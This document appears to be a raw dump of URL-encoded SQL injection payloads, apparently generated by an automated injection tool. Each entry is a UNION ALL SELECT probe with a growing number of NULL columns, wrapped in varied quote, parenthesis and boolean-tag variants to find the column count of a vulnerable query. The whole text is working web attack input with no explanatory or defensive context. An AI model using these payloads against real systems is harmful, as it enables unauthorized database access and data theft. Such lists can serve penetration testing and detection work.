1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%287142%3D7142 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%289639%3D9639 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%284222%3D4222 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%286010%3D6010 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27KSUt%27%3D%27KSUt 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27uYMe%27%3D%27uYMe 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27CvGZ%27%3D%27CvGZ 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27yPJa%27%3D%27yPJa 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27efnX%27%3D%27efnX 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27DqEp%27%3D%27DqEp 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27bkPa%27%3D%27bkPa 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27nvZZ%27%3D%27nvZZ 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27xZvo%27%3D%27xZvo 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27BvhM%27%3D%27BvhM 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27WrGP%27%3D%27WrGP 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27MJoH%27%3D%27MJoH 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27gmMB%27%3D%27gmMB 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27YkXE%27%3D%27YkXE 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27usme%27%3D%27usme 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27nqzh%27%3D%27nqzh 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27EsVS%27%3D%27EsVS 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27RDuG%27%3D%27RDuG 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27MLvy%27%3D%27MLvy 1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%27sPJy%27%3D%27sPJy 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27oTbe%27%3D%27oTbe 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27AemT%27%3D%27AemT 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27NsNP%27%3D%27NsNP 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27cjMI%27%3D%27cjMI 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27VZlF%27%3D%27VZlF 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27yMnm%27%3D%27yMnm 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27mlHW%27%3D%27mlHW 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27eQfl%27%3D%27eQfl 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27FVsx%27%3D%27FVsx 1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%28%27vRxU%27%3D%27vRxU 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27TXVB%27%3D%27TXVB 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27qcyG%27%3D%27qcyG 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27zIXG%27%3D%27zIXG 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27yIpw%27%3D%27yIpw 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27AUKE%27%3D%27AUKE 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27rzAs%27%3D%27rzAs 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27nWXe%27%3D%27nWXe 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27nIkC%27%3D%27nIkC 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27zATa%27%3D%27zATa 1%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%27SkaW%27%3D%27SkaW 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27NEhk%27%20LIKE%20%27NEhk 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27tgTD%27%20LIKE%20%27tgTD 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27IrOn%27%20LIKE%20%27IrOn 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27EsDv%27%20LIKE%20%27EsDv 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27vYhi%27%20LIKE%20%27vYhi 1%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%27mHPd%27%20LIKE%20%27mHPd 